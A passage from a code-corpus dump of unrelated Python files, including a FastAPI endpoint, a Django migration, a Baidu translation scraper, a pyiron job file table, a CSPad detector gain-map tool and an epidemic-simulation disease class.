return {"grade": "good", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fccw0Ec%2FbtqEGT3j7wD%2FRgRM2mESHJ0Jcdij1vQcgK%2Fimg.png"}
@app.get("/2/")
async def moderate():
return {"grade": "moderate", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fccw0Ec%2FbtqEGT3j7wD%2FRgRM2mESHJ0Jcdij1vQcgK%2Fimg.png"}
@app.get("/3/")
async def bad():
return {"grade": "bad", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkIqsC%2FbtqEGT92fDc%2FHdq9Qowhgxvbrn94igvzMK%2Fimg.png"}
@app.get("/4/")
async def very_bad():
return {"grade": "very_bad", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkIqsC%2FbtqEGT92fDc%2FHdq9Qowhgxvbrn94igvzMK%2Fimg.png"}
if __name__ == "__main__":
uvicorn.run("main:app", host="0.0.0.0", port=8080)
|
998,363 | 7da22eb59a6c026ac0952158788b8c3919b313fc | import logging
import pytest
from pathlib import Path
from pprint import pprint
from openpyxl import load_workbook
from util.read_excel_data import get_yaml
# @pytest.fixture(scope='session')
# def load_testdata_from_caseexcel():
# def _load_testdata_from_caseexcel(project, apiName):
# excel_path = Path(f'projects/{project}/data/{project}.xlsx')
# wb = load_workbook(excel_path)
# # ws = wb.get_sheet_by_name('phone_test')#弃用
# ws = wb[apiName]
# title = list(ws.values)[1]
# test_data = list(ws.values)[2:]
# exec_index = title.index('exec')
# case_data_list = []
# for i in test_data:
# if i[exec_index] in ['Y','y']:
# case_data_dict = dict(zip(title,i[:-2]))
# case_data_list.append(case_data_dict)
# yaml_file = Path(f'projects/{project}/conf/{apiName}.yaml')
# api_info = get_yaml(yaml_file)
# api_info.pop('parmas')
# api_info.pop('response_assert')
# case_data_list.append(api_info)
# return case_data_list
# return _load_testdata_from_caseexcel
# collect_ignore = ["projects/BigData/"]
collect_ignore_glob = ['projects/VBA']
def set_log(caplog):
caplog.set_level(logging.CRITICAL)
if __name__ == '__main__':
# load_testdata_from_caseexcel('BigData')
pass
|
998,364 | 641762c242004fd9968e2ac6f7f0093675cfc2ed | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-07 15:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('appointment', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='DateTime',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('time_start', models.TimeField()),
('time_end', models.TimeField()),
],
),
migrations.RemoveField(
model_name='time',
name='date',
),
migrations.RemoveField(
model_name='appointment',
name='time',
),
migrations.AlterField(
model_name='appointment',
name='date',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='appointment.DateTime'),
),
migrations.DeleteModel(
name='Date',
),
migrations.DeleteModel(
name='Time',
),
]
|
998,365 | fcade2f9cc576c79ad8f13e9618f10136f68a986 | import tarfile
with tarfile.open('example.tar.gz', 'w:gz') as tar:
tar.add('content1.txt')
tar.add('content2.txt')
tar.add('subfolder/content3.txt')
tar.add('subfolder/content4.txt')
with tarfile.open('example.tar.gz', 'r:gz') as tar:
tar.extractall('extract_tar')
|
998,366 | b3064d8495c99ef70f588d6414c5b74bb4e5b078 | # -*-coding:utf-8 -*-
# File :basicPost.py
# Author:George
# Date : 2018/12/4
"""
测试基本的post方法提交数据 需要提交数据的操作
编码 转码操作
字符串(str)====》字节(byte) encode编码(采取Unicode方式编码 使用双字节方式编码字符串)
字节(byte)====》字符串(str) decode解码
read()读取出来的是二进制数据(bit/byte) 转换成srt需要解码
针对post方法的编码
urllib.parse.urlencode(data).encode('utf-8')
"""
import json
import urllib.request
import urllib.parse
url = 'http://fanyi.baidu.com/sug'
# UA 是最基本的伪装
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'
}
word = input('请输入要查询的词语:')
# post中提交表单
data = {
'kw': word
}
# 编码动作 按照utf-8编码 针对post请求参数的转码 编码
data = urllib.parse.urlencode(data).encode('utf-8')
# 构建请求对象 自定义伪装请求
request = urllib.request.Request(url=url, headers=headers, data=data)
# 发送请求 urlopen() 参数里面可以放 url 可以放 request对象
result = urllib.request.urlopen(request)
# 读取查看 读取转码
resultDecoded = result.read().decode('utf-8')
# 将返回的json字符串转换成python对象(json字典对象)
jsonResult = json.loads(resultDecoded)
# 将python对象转换为json字符串 确保编码不出错
str = json.dumps(jsonResult, ensure_ascii=False)
with open(r'F:\Testing_Automation\UnittestProjects\UnittestBasic\urllibPackges\downloads\json.json', 'w', encoding='utf-8') as fw:
fw.write(str)
|
998,367 | 2424bdf6a3dbd194a3b9987e15fcf35d7c1608c4 | import os
import sys
import json
import laspy
import runpy
from src.helpers import logger,classify
logger = logger.setup_custom_logger('myapp')
filename = sys.argv[1]
today_date=sys.argv[2]
previous_date=sys.argv[3]
if not(os.path.exists('./data/'+filename+'/interim')):
os.mkdir('./data/'+filename+'/interim')
if not(os.path.exists('./data/'+filename+'/interim/extracted_images')):
os.mkdir('./data/'+filename+'/interim/extracted_images')
if not(os.path.exists('./data/'+filename+'/interim/classified_images')):
os.mkdir('./data/'+filename+'/interim/classified_images')
################################################################################################################
#Structural progress
logger.info('Structural progress Calculation: Started')
if not(os.path.exists('./data/'+filename+'/interim/boundaries.json')):
runpy.run_path(path_name='src/helpers/structural_progress.py')
logger.info('Structural progress Calculation: Finished')
################################################################################################################
#Finding Best BIM images
logger.info('Finding Best BIM Images: Started')
if not(os.path.exists('./data/'+filename+'/interim/best_image.json')):
runpy.run_path(path_name='src/helpers/bim_image.py')
logger.info('Finding Best BIM Images: Finished')
################################################################################################################
#Extracting Best BIM images
logger.info('Extracting Best BIM Images: Started')
runpy.run_path(path_name='src/helpers/extract_image.py')
logger.info('Extracting Best BIM Images: Finished')
################################################################################################################
#Classifying Extracted BIM images
logger.info('Classifying Best BIM Images : Started')
if not(os.path.exists('./data/external/'+filename+'.json')):
runpy.run_path(path_name='src/helpers/classify_multi.py')
logger.info('Classifying Best BIM Images : Finished')
################################################################################################################
#Updating Construction Dates
logger.info('Updating Construction Dates: Started')
exec(open('./src/helpers/adding_dates.py').read())
logger.info('Updating Construction Dates: Finished')
################################################################################################################
#Providing Analysis based on Project Plan
logger.info('Project Paln Analysis: Started')
if not(os.path.exists('./reports'+filename+'.txt')):
exec(open('./src/helpers/insight.py').read())
logger.info('Project Plan: Finished') |
998,368 | d6b495f67ee500957988c6900a6a4af6c90292a0 | #!/usr/bin/env python
import sys
import telnetlib
import json
import threading
import time
telnet = telnetlib.Telnet('127.0.0.1', 1705)
requestId = 1
def doRequest( j, requestId ):
print("send: " + j)
telnet.write(j + "\r\n")
while (True):
response = telnet.read_until("\r\n", 2)
jResponse = json.loads(response)
if 'id' in jResponse:
if jResponse['id'] == requestId:
return jResponse;
return;
def setVolume(client, volume):
global requestId
doRequest(json.dumps({'jsonrpc': '2.0', 'method': 'Client.SetVolume', 'params': {'client': client, 'volume': volume}, 'id': requestId}), requestId)
requestId = requestId + 1
volume = int(sys.argv[2])
setVolume(sys.argv[1], volume)
telnet.close
|
998,369 | ce49a78f155df05c24354f9717b2ce0871edea26 | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import pickle
import math
from temp.features import get_features
def get_samples(_index, s_s_chs, sr, _size=1.3):
instances = []
for _ind in _index:
instances.append(s_s_chs[_ind:int(math.ceil(_ind + (_size * sr)))][:])
return np.array(instances)
def get_subdataset(_S=1, Sess=1):
_file = 'train/Data_S%02d_Sess%02d.csv' % (_S, Sess)
_f = open(_file).readlines()
channels = []
_header = []
for i, _rows in enumerate(_f):
if i > 0:
channels.append(eval(_rows))
else:
_header = _rows
_header = _header.split(',')
return np.array(channels), np.array(_header[1:-1])
def get_dataset(subject=1, session=1):
sr = 200
ch_fs_instances = []
ch_tags_instances = []
s_s_chs, _header = get_subdataset(subject, session)
_index = [i + 1 for i, d in enumerate(s_s_chs[:, -1]) if d == 1]
instances = get_samples(_index, s_s_chs, sr)
for f_instance in range(1, 3): # len(instances) 60 instances
instance = np.array(instances[f_instance, :, 1:-1]).transpose()
ch_fs_instances.append(get_features(instance))
ch_tags_instances.append('subject_{0}'.format(subject))
return {"data": ch_fs_instances, "target": ch_tags_instances}
def eval_model(dataset, clf):
false_accepted = 0
Ok_accepted = 0
total_tags = len(dataset['target'])
for i, unk_entry in enumerate(dataset['target']):
true_tag = dataset['target'][i]
feature_vector = np.array([dataset['data'][i]])
print("feature_vector: ", np.shape(feature_vector))
prediction = clf.predict(feature_vector)[0]
accuracy = max(max(clf.predict_proba(feature_vector)))
result_ = "True label: {0}, prediction: {1}, accuracy: {2}".format(true_tag, prediction, accuracy)
print(result_)
if true_tag == prediction:
Ok_accepted += 1
else:
false_accepted += 1
print('Ok_accepted {0}'.format(Ok_accepted))
print('false_accepted {0}'.format(false_accepted))
print('accuracy of Ok_accepted {0}'.format(round(Ok_accepted / total_tags, 10)))
print('accuracy of false_accepted {0}'.format(round(false_accepted / total_tags, 10)))
subject = 1
session = 1
dataset = get_dataset(subject, session)
model = open('clf.sav', 'rb')
clf = pickle.load(model)
eval_model(dataset, clf)
|
998,370 | 913e25e9d5e3c71c3f82443dde3e709c261181f4 | import numpy as np
import os
import pandas
import datetime
import h5io
from pyfileindex import PyFileIndex
from pyiron_base.generic.util import Singleton
def filter_function(file_name):
return '.h5' in file_name
class FileTable(metaclass=Singleton):
def __init__(self, project):
self._fileindex = None
self._job_table = None
self._project = os.path.abspath(project)
self._columns = ['id', 'status', 'chemicalformula', 'job', 'subjob', 'projectpath', 'project', 'timestart',
'timestop', 'totalcputime', 'computer', 'hamilton', 'hamversion', 'parentid', 'masterid',
'username']
self.force_reset()
@property
def viewer_mode(self):
return None
def force_reset(self):
self._fileindex = PyFileIndex(
path=self._project,
filter_function=filter_function
)
df = pandas.DataFrame(self.init_table(fileindex=self._fileindex.dataframe))
if len(df) != 0:
df.id = df.id.astype(int)
self._job_table = df[np.array(self._columns)]
else:
self._job_table = pandas.DataFrame({k: [] for k in self._columns})
def init_table(self, fileindex, working_dir_lst=None):
if working_dir_lst is None:
working_dir_lst = []
fileindex = fileindex[~fileindex.is_directory]
fileindex = fileindex.iloc[fileindex.path.values.argsort()]
job_lst = []
for path, mtime in zip(fileindex.path, fileindex.mtime):
job_dict = self.get_extract(path, mtime)
job_dict['id'] = len(working_dir_lst) + 1
working_dir_lst.append(job_dict['project'][:-1] + job_dict['subjob'] + '_hdf5/')
if job_dict['project'] in working_dir_lst:
job_dict['masterid'] = working_dir_lst.index(job_dict['project']) + 1
else:
job_dict['masterid'] = None
job_lst.append(job_dict)
return job_lst
def add_item_dict(self, par_dict):
par_dict = dict((key.lower(), value) for key, value in par_dict.items())
if len(self._job_table) != 0:
job_id = np.max(self._job_table.id.values) + 1
else:
job_id = 1
default_values = {
'id': job_id,
'status': 'initialized',
'chemicalformula': None,
'timestart': datetime.datetime.now(),
'computer': None,
'parentid': None,
'username': None,
'timestop': None,
'totalcputime': None,
'masterid': None
}
for k, v in default_values.items():
if k not in par_dict.keys():
par_dict[k] = v
self._job_table = pandas.concat([
self._job_table,
pandas.DataFrame([par_dict])[self._columns]
]).reset_index(drop=True)
return int(par_dict['id'])
def item_update(self, par_dict, item_id):
if isinstance(item_id, list):
item_id = item_id[0]
if isinstance(item_id, str):
item_id = float(item_id)
for k, v in par_dict.items():
self._job_table.loc[self._job_table.id == int(item_id), k] = v
def delete_item(self, item_id):
item_id = int(item_id)
if item_id in [int(v) for v in self._job_table.id.values]:
self._job_table = self._job_table[self._job_table.id != item_id].reset_index(drop=True)
else:
raise ValueError
def get_item_by_id(self, item_id):
item_id = int(item_id)
return {k: list(v.values())[0] for k, v in self._job_table[self._job_table.id == item_id].to_dict().items()}
def get_items_dict(self, item_dict, return_all_columns=True):
df = self._job_table
if not isinstance(item_dict, dict):
raise TypeError
for k, v in item_dict.items():
if k in ['id', 'parentid', 'masterid']:
df = df[df[k] == int(v)]
elif "%" not in str(v):
df = df[df[k] == v]
else:
df = df[df[k].str.contains(v.replace('%', ''))]
df_dict = df.to_dict()
if return_all_columns:
return [{k: v[i] for k, v in df_dict.items()} for i in df_dict['id'].keys()]
else:
return [{'id': i} for i in df_dict['id'].values()]
def update(self):
self._job_table.status = [
self._get_job_status_from_hdf5(job_id)
for job_id in self._job_table.id.values
]
self._fileindex.update()
if len(self._job_table) != 0:
files_lst, working_dir_lst = zip(*[[project + subjob[1:] + '.h5', project + subjob[1:] + '_hdf5']
for project, subjob in zip(self._job_table.project.values,
self._job_table.subjob.values)])
df_new = self._fileindex.dataframe[
~self._fileindex.dataframe.is_directory & ~self._fileindex.dataframe.path.isin(files_lst)]
else:
files_lst, working_dir_lst = [], []
df_new = self._fileindex.dataframe[~self._fileindex.dataframe.is_directory]
if len(df_new) > 0:
job_lst = self.init_table(fileindex=df_new, working_dir_lst=list(working_dir_lst))
df = pandas.DataFrame(job_lst)[self._columns]
if len(files_lst) != 0 and len(working_dir_lst) != 0:
self._job_table = pandas.concat([self._job_table, df]).reset_index(drop=True)
else:
self._job_table = df
def get_db_columns(self):
return self.get_table_headings()
def get_table_headings(self):
return self._job_table.columns.values
def job_table(
self,
project=None,
recursive=True,
columns=None,
all_columns=False,
sort_by="id",
max_colwidth=200,
full_table=False,
job_name_contains=''
):
if project is None:
project = self._project
if columns is None:
columns = ["job", "project", "chemicalformula"]
if all_columns:
columns = self._columns
if len(self._job_table) != 0:
if recursive:
df = self._job_table[self._job_table.project.str.contains(project)]
else:
df = self._job_table[self._job_table.project == project]
else:
df = self._job_table
if full_table:
pandas.set_option('display.max_rows', None)
pandas.set_option('display.max_columns', None)
else:
pandas.reset_option('display.max_rows')
pandas.reset_option('display.max_columns')
pandas.set_option("display.max_colwidth", max_colwidth)
if len(df) == 0:
return df
if job_name_contains != '':
df = df[df.job.str.contains(job_name_contains)]
if sort_by in columns:
return df[columns].sort_values(by=sort_by)
return df[columns]
def get_jobs(self, project=None, recursive=True, columns=None):
if project is None:
project = self._project
if columns is None:
columns = ["id", "project"]
df = self.job_table(project=project, recursive=recursive, columns=columns)
if len(df) == 0:
dictionary = {}
for key in columns:
dictionary[key] = list()
return dictionary
# return {key: list() for key in columns}
dictionary = {}
for key in df.keys():
dictionary[key] = df[
key
].tolist() # ToDo: Check difference of tolist and to_list
return dictionary
def get_job_ids(self, project=None, recursive=True):
return self.get_jobs(project=project, recursive=recursive, columns=['id'])["id"]
def get_job_id(self, job_specifier, project=None):
if project is None:
project = self._project
if isinstance(job_specifier, (int, np.integer)):
return job_specifier # is id
job_specifier.replace(".", "_")
job_id_lst = self._job_table[
(self._job_table.project == project) & (self._job_table.job == job_specifier)].id.values
if len(job_id_lst) == 0:
job_id_lst = self._job_table[
self._job_table.project.str.contains(project) & (self._job_table.job == job_specifier)].id.values
if len(job_id_lst) == 0:
return None
elif len(job_id_lst) == 1:
return int(job_id_lst[0])
else:
raise ValueError(
"job name '{0}' in this project is not unique".format(job_specifier)
)
def get_child_ids(self, job_specifier, project=None, status=None):
"""
Get the childs for a specific job
Args:
database (DatabaseAccess): Database object
sql_query (str): SQL query to enter a more specific request
user (str): username of the user whoes user space should be searched
project_path (str): root_path - this is in contrast to the project_path in GenericPath
job_specifier (str): name of the master job or the master jobs job ID
status (str): filter childs which match a specific status - None by default
Returns:
list: list of child IDs
"""
if project is None:
project = self._project
id_master = self.get_job_id(project=project, job_specifier=job_specifier)
if id_master is None:
return []
else:
if status is not None:
id_lst = self._job_table[
(self._job_table.masterid == id_master) & (self._job_table.status == status)].id.values
else:
id_lst = self._job_table[(self._job_table.masterid == id_master)].id.values
return sorted(id_lst)
def get_job_working_directory(self, job_id):
"""
Get the working directory of a particular job
Args:
job_id (int):
Returns:
str: working directory as absolute path
"""
try:
db_entry = self.get_item_by_id(job_id)
if db_entry and len(db_entry) > 0:
job_name = db_entry["subjob"][1:]
return os.path.join(
db_entry["project"],
job_name + "_hdf5",
job_name,
)
else:
return None
except KeyError:
return None
def _get_job_status_from_hdf5(self, job_id):
db_entry = self.get_item_by_id(job_id)
job_name = db_entry["subjob"][1:]
return get_job_status_from_file(
hdf5_file=os.path.join(db_entry["project"], job_name + ".h5"),
job_name=job_name
)
def get_job_status(self, job_id):
return self._job_table[self._job_table.id == job_id].status.values[0]
def set_job_status(self, job_id, status):
db_entry = self.get_item_by_id(item_id=job_id)
self._job_table.loc[self._job_table.id == job_id, 'status'] = status
h5io.write_hdf5(db_entry["project"] + db_entry["subjob"] + '.h5',
status,
title=db_entry["subjob"][1:] + '/status',
overwrite="update")
@staticmethod
def get_extract(path, mtime):
basename = os.path.basename(path)
job = os.path.splitext(basename)[0]
time = datetime.datetime.fromtimestamp(mtime)
return {
'status': get_job_status_from_file(hdf5_file=path, job_name=job),
'chemicalformula': None,
'job': job,
'subjob': '/' + job,
'projectpath': None,
'project': os.path.dirname(path) + '/',
'timestart': time,
'timestop': time,
'totalcputime': 0.0,
'computer': None,
'username': None,
'parentid': None,
'hamilton': get_hamilton_from_file(hdf5_file=path, job_name=job),
'hamversion': get_hamilton_version_from_file(hdf5_file=path, job_name=job)
}
def get_hamilton_from_file(hdf5_file, job_name):
return h5io.read_hdf5(hdf5_file, job_name + '/TYPE').split(".")[-1].split("'")[0]
def get_hamilton_version_from_file(hdf5_file, job_name):
return h5io.read_hdf5(hdf5_file, job_name + '/VERSION')
def get_job_status_from_file(hdf5_file, job_name):
return h5io.read_hdf5(hdf5_file, job_name + '/status')
|
998,371 | ca635aa55f53e6b76038347ac6499c41807dc1d7 | import json as json
with open('dic.json') as dic_file:
dic = json.load(dic_file)
#for x in dic:
# print("%s: %s" % (x, dic[x]))
month = ['','January', 'February', 'March', 'April', 'May', 'June',
'July', 'August', 'September', 'October', 'November', 'December']
count = [0,0,0,0,0,0,0,0,0,0,0,0,0]
for x in dic:
for y in range(1,13):
if y<10:
if dic[x].find('/0'+str(y)+'/')>0:
count[y]+=1
else:
if dic[x].find('/' + str(y) + '/') > 0:
count[y] += 1
for x in range(1,13):
if count[x]>1:
print(month[x]+' has '+str(count[x])+' friends.')
else:
print(month[x] + ' has ' + str(count[x]) + ' friend.')
|
998,372 | 1afa263c6fc8423e448f0b626ffce70ca9454621 | from __future__ import absolute_import, division, print_function
from six.moves import range
# LIBTBX_SET_DISPATCHER_NAME cxi.gain_map
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT
import sys,time,math
import numpy
from libtbx import easy_pickle
import libtbx.load_env
from libtbx.option_parser import option_parser
from scitbx.array_family import flex
from xfel.cxi.cspad_ana import cspad_tbx
from xfel.cxi.cspad_ana import parse_calib
from iotbx.detectors.cspad_detector_formats import address_and_timestamp_from_detector_format_version
from xfel.cxi.cspad_ana.cspad_tbx import evt_timestamp
# Fake objects to emulate the minimal functionality so that we can reuse the
# functions CsPad2x2Image and CsPadDetector in cspad_tbx.py
def fake_get_config(address, env):
return fake_config()
cspad_tbx.getConfig = fake_get_config
class fake_cspad_ElementV2(object):
def __init__(self, data, quad):
self._data = data
self._quad = quad
def data(self):
return self._data
def quad(self):
return self._quad
class fake_config(object):
def sections(self, i):
return list(range(8))
def quadMask(self):
return 15
def roiMask(self, i):
return 255
class fake_env(object):
# XXX Not tested!
def __init__(self, config):
self._config = config
def getConfig(self, Id, address):
return self._config
class fake_evt(object):
# XXX Not tested!
def __init__(self, data3d):
self._data3d = data3d
def getCsPadQuads(self, address, env):
return self._data3d
def getTime(self):
class fakeTime(object):
def __init__(self):
t = time.time()
s = int(math.floor(t))
self.s = s
self.n = int(round((t - s) * 1000))
def seconds(self): return self.s
def nanoseconds(self): return self.n
return fakeTime()
def run(args):
command_line = (option_parser()
.option("-o", "--output_filename",
action="store",
type="string",
help="Filename for the output pickle file",
default="gain_map.pickle")
.option("-f", "--detector_format_version",
action="store",
type="string",
help="Detector format version to use for generating active areas and laying out tiles",
default=None)
.option("-m", "--optical_metrology_path",
action="store",
type="string",
help="Path to slac optical metrology file. If not set, use Run 4 metrology",
default=None)
.option("-d", "--distance",
action="store",
type="int",
help="Detector distance put into the gain pickle file. Not needed for processing.",
default="0")
.option("-w", "--wavelength",
action="store",
type="float",
help="Incident beam wavelength put into the gain pickle file. Not needed for processing.",
default="0")
).process(args=args)
output_filename = command_line.options.output_filename
detector_format_version = command_line.options.detector_format_version
if detector_format_version is None or 'XPP' not in detector_format_version:
beam_center_x = None
beam_center_y = None
else:
beam_center_x = 1765 // 2 * 0.11
beam_center_y = 1765 // 2 * 0.11
address, timestamp = address_and_timestamp_from_detector_format_version(detector_format_version)
# if no detector format version is provided, make sure to write no address to the image pickle
# but CsPadDetector (called later), needs an address, so give it a fake one
save_address = address is not None
if not save_address:
address = "CxiDs1-0|Cspad-0" # time stamp will still be None
timestamp = evt_timestamp((timestamp,0))
args = command_line.args
assert len(args) == 1
if args[0].endswith('.npy'):
data = numpy.load(args[0])
det, active_areas = convert_2x2(data, detector_format_version, address)
elif args[0].endswith('.txt') or args[0].endswith('.gain'):
raw_data = numpy.loadtxt(args[0])
assert raw_data.shape in [(5920, 388), (11840, 194)]
det, active_areas = convert_detector(raw_data, detector_format_version, address, command_line.options.optical_metrology_path)
img_diff = det
img_sel = (img_diff > 0).as_1d()
gain_map = flex.double(img_diff.accessor(), 0)
gain_map.as_1d().set_selected(img_sel.iselection(), 1/img_diff.as_1d().select(img_sel))
gain_map /= flex.mean(gain_map.as_1d().select(img_sel))
if not save_address:
address = None
d = cspad_tbx.dpack(data=gain_map, address=address, active_areas=active_areas, timestamp=timestamp,
distance=command_line.options.distance,wavelength=command_line.options.wavelength,
beam_center_x = beam_center_x, beam_center_y = beam_center_y)
easy_pickle.dump(output_filename, d)
def convert_detector(raw_data, detector_format_version, address, optical_metrology_path=None):
# https://confluence.slac.stanford.edu/display/PCDS/CSPad+metrology+and+calibration+files%2C+links
data3d = []
if raw_data.shape == (5920,388):
asic_start = 0
if optical_metrology_path is None:
calib_dir = libtbx.env.find_in_repositories("xfel/metrology/CSPad/run4/CxiDs1.0_Cspad.0")
sections = parse_calib.calib2sections(calib_dir)
else:
sections = parse_calib.calib2sections(optical_metrology_path)
for i_quad in range(4):
asic_size = 185 * 388
section_size = asic_size * 2
quad_start = i_quad * section_size * 4
quad_asics = []
for i_2x2 in range(4):
for i_asic in range(2):
asic_end = asic_start + 185
quad_asics.append(raw_data[asic_start:asic_end, :])
asic_start = asic_end
quad_data = numpy.dstack(quad_asics)
quad_data = numpy.rollaxis(quad_data, 2,0)
data3d.append(fake_cspad_ElementV2(quad_data, i_quad))
env = fake_env(fake_config())
evt = fake_evt(data3d)
return flex.double(cspad_tbx.CsPadDetector(address, evt, env, sections).astype(numpy.float64)), None
else:
asic_start = 0
if detector_format_version is not None and 'XPP' in detector_format_version:
from xfel.cxi.cspad_ana.cspad_tbx import xpp_active_areas
rotations = xpp_active_areas[detector_format_version]['rotations']
active_areas = xpp_active_areas[detector_format_version]['active_areas']
det = flex.double([0]*(1765*1765))
det.reshape(flex.grid((1765,1765)))
for i in range(64):
row = active_areas[i*4]
col = active_areas[i*4 + 1]
block = flex.double(raw_data[i * 185:(i+1)*185, :])
det.matrix_paste_block_in_place(block.matrix_rot90(rotations[i]), row, col)
return det, active_areas
else:
if optical_metrology_path is None:
calib_dir = libtbx.env.find_in_repositories("xfel/metrology/CSPad/run4/CxiDs1.0_Cspad.0")
sections = parse_calib.calib2sections(calib_dir)
else:
sections = parse_calib.calib2sections(optical_metrology_path)
for i_quad in range(4):
asic_size = 185 * 194
section_size = asic_size * 4
quad_start = i_quad * section_size * 4
quad_asics = []
for i_2x2 in range(4):
for i_asic in range(2):
asic_end = asic_start + 185
a = raw_data[asic_start:asic_end, :]
asic_start = asic_end
asic_end = asic_start + 185
b = raw_data[asic_start:asic_end, :]
asic_start = asic_end
quad_asics.append(numpy.concatenate((a,b),axis=1))
quad_data = numpy.dstack(quad_asics)
quad_data = numpy.rollaxis(quad_data, 2,0)
data3d.append(fake_cspad_ElementV2(quad_data, i_quad))
env = fake_env(fake_config())
evt = fake_evt(data3d)
beam_center, active_areas = cspad_tbx.cbcaa(fake_config(),sections)
return flex.double(cspad_tbx.CsPadDetector(address, evt, env, sections).astype(numpy.float64)), active_areas
def convert_2x2(data):
config = fake_config()
sections = [[parse_calib.Section(90, (185 / 2 + 0, (2 * 194 + 3) / 2)),
parse_calib.Section(90, (185 / 2 + 185, (2 * 194 + 3) / 2))]]
if data.shape == (2, 185, 388):
data = numpy.rollaxis(data, 0, 3)
elif data.shape == (370, 388):
data = numpy.dstack((data[:185, :], data[185:, :]))
else:
raise RuntimeError("Shape of numpy array is %s: I don't know what to do with an array this shape!")
return cspad_tbx.CsPad2x2Image(data, config, sections)
if __name__ == '__main__':
run(sys.argv[1:])
|
998,373 | ff508dc8f26ab0bd0849df1743474e542393daa8 | from sklearn import datasets
from sklearn import svm
import sklearn
cancer = datasets.load_breast_cancer()
x = cancer.data
y = cancer.target
#splitting the data into train_set and test_set
x_train,x_test,y_train,y_test = sklearn.model_selection.train_test_split(x, y, test_size=0.2)
clf = svm.SVC()
#training the model
clf.fit(x_train,y_train)
#predicting the test_set
y_pred = clf.predict(x_test)
print(y_pred)
#accuracy score
acc = sklearn.metrics.accuracy_score(y_test,y_pred)
print(acc) |
998,374 | b74ff037d97f43378fddd3fd297fd991eb1836d5 | """
This file contains all of the relevant classes etc. for diseases, including their symptoms, method of transmission, rate of transmission, etc.
"""
from SINUtil import *
class Disease:
import PersonState as ps
DISEASE_ID_COUNTER = 0
def __init__(self,name:str,calculate_R_0=False):
self.name = name
self.calculate_R_0 = calculate_R_0
#defaults describe the null disease that can't actually do anything
self.infectivity = {'idle':0.,
'sleep':0.,
'traveling':0.,
'talking':0.,
'intimate':0.}#per time step of doing this interaction with someone infected (in the case of idle, traveling, and sleep, in the same room), what is the probability they infect me, per infected person nearby?
for action_type in self.ps.ACTIVITY_TYPES:
assert(action_type in self.infectivity)
self.hand_wash_coef = 0.#how much does washing hands affect this disease? lower numbers means it affects this less
self.symptom_show_rate = 0.#per day, what is the probability a person infected with this disease goes from infectious but without symptoms to infectious but with symptoms?
self.symptom_infectivity_modifier = 0.#given that the infected person is showing symptoms, how does the infectivity change? (usually goes up)
self.recovery_rate = 0.#per day, what is the probability I recover (go from the IS state to the R state)?
self.die_probability = 0.#per day, what is the probability I die (from the IS state to the D state), given that the healthiness check failed?
self.state_infectability_modifiers = {'S':0.,#this is usually 0
'II':0.,
'VII':0.,
'IS':0.,
'VIS':0.,
'R':0.,
'VR':0.,
'VS':0.,
'VU':0,
'D':0.,#this is useful so we can figure out which disease killed which person
'VD':0.,
} #given that I am, for this disease, in this state, how much more (positive) or less (negative) likely am I to be infected with something else?
self.vaccination_effectiveness = 0. #how effective is the vaccine? (probability it actually makes you nonsusceptible
self.vaccination_rate = 0. #what is the probability any given person is vaccinated against this disease?
self.symptom_health_effect = 0. #to what extent does this disease hurt the healthiness of the individual? (for the cold, it's not too bad, for zika, this would be debilitating (high))
self.treatability = 0. #how much can doctors in the hospital actually help if we're infected with this?
for infection_state in DISEASE_STATES:
assert(infection_state in self.state_infectability_modifiers)
self.disease_id = Disease.DISEASE_ID_COUNTER
Disease.DISEASE_ID_COUNTER += 1
self.num_infected_by = {} #how many people has a given person infected
def __repr__(self):
return "Disease " + str(self.disease_id) + ": " + self.name
def recover(self,person:ps.Person):
is_in_hopsital = person.currentLocation.loc_type == 'hospital'
hospital_effect = 0.
if is_in_hopsital:
hospital_effect = HOSPITAL_TREATMENT_EFFECT * self.treatability
return coinflip(min(self.recovery_rate + hospital_effect,1.))
def symptom_show(self):
return coinflip(self.symptom_show_rate)
def die(self,person:ps.Person):
if coinflip(1 - person.get_effective_healthiness()):#healthier means this is less likely to happen
is_in_hopsital = person.currentLocation.loc_type == 'hospital'
hospital_effect = 0.
if is_in_hopsital:
hospital_effect = HOSPITAL_TREATMENT_EFFECT * self.treatability
return coinflip(max(0,self.die_probability - hospital_effect))#hospitals make it *less* likely that you'll die
def decide_is_vaccinated(self,person:ps.Person):
#TODO: antivax clustering here?
return coinflip(self.vaccination_rate)
def disease_state_transition(self,person:ps.Person):
if (person.disease_state[self] == 'II') and (self.symptom_show()):
person.disease_state[self] = 'IS'
elif (person.disease_state[self] == 'VII') and (self.symptom_show()):
person.disease_state[self] = 'VIS'
elif (person.disease_state[self] == 'IS') and (self.recover(person)):
person.disease_state[self] = 'R'
elif (person.disease_state[self] == 'VIS') and (self.recover(person)):
person.disease_state[self] = 'VR'
elif (person.disease_state[self] == 'IS') and (self.die(person)):
person.disease_state[self] = 'D'
person.die() #F
elif (person.disease_state[self] == 'VIS') and (self.die(person)):
person.disease_state[self] = 'VD'
person.die() #F
#set the diseases showing symptoms variable
for disease in person.disease_state:
if person.disease_state[disease] in DISEASE_STATES_SYMPTOMATIC:
person.diseasesShowingSymptoms = True
return
person.diseasesShowingSymptoms = False
"""
Does person a infect person b?
"""
def infects(self,a : ps.Person,b : ps.Person):
